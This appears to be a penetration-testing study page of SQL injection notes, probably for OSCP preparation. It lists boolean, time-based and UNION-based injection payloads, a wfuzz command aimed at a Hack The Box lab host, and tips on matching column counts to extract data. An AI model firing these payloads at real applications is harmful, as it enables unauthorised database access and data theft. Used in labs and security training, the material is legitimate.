// notes/ Web Exploitation
🕸️

SQL Injection

<strong' order by 1 -- -

#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection

SQL Injection

Manual

<pre><code>' or 1=1 ' or 1=1-- - ' or 1=1# ' or 1=1/ ' or 1=1-- - // <strong>' order by 1 -- - </strong>' order by 1-- # ' or sleep(5)-- - " or sleep(5)=" ' or sleep(5)=' 'waitfor delay '0:0:5'-- ;waitfor delay '0:0:5'-- ';waitfor delay '0:0:5'-- ' AND IF (1=1, sleep(3),'false') -- // union select &#x3C;number of columns> </code></pre>

{% hint style="info" %} AND can be used to replace OR as well {% endhint %}

code
01%
02If an application accepts a % as a wildcard the query most likely is putting
03%'s inbetween the input (%joe%) to find something "like" the input

{% hint style="info" %} Test on php applications like for example {% endhint %}

Fuzz with special characters

code
01wfuzz -u http://box.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404

After finding an injection spot try to figure out how the query is structured

{% embed url="https://dev.mysql.com/doc/refman/8.4/en/select.html" %}

{% hint style="info" %} With UNION SELECT you must have the same amount of parameters on the right side as you do on the left {% endhint %}

{% embed url="https://htb.adot8.com/hack-the-box/oscp-like-boxes/linux/jarvis/eumeration/80" %}

If the initial query is false then we can overwrite the output. We can insert payloads into one of the parameters

code
01union select 1,2,(<Payload>),3,4,5,6,7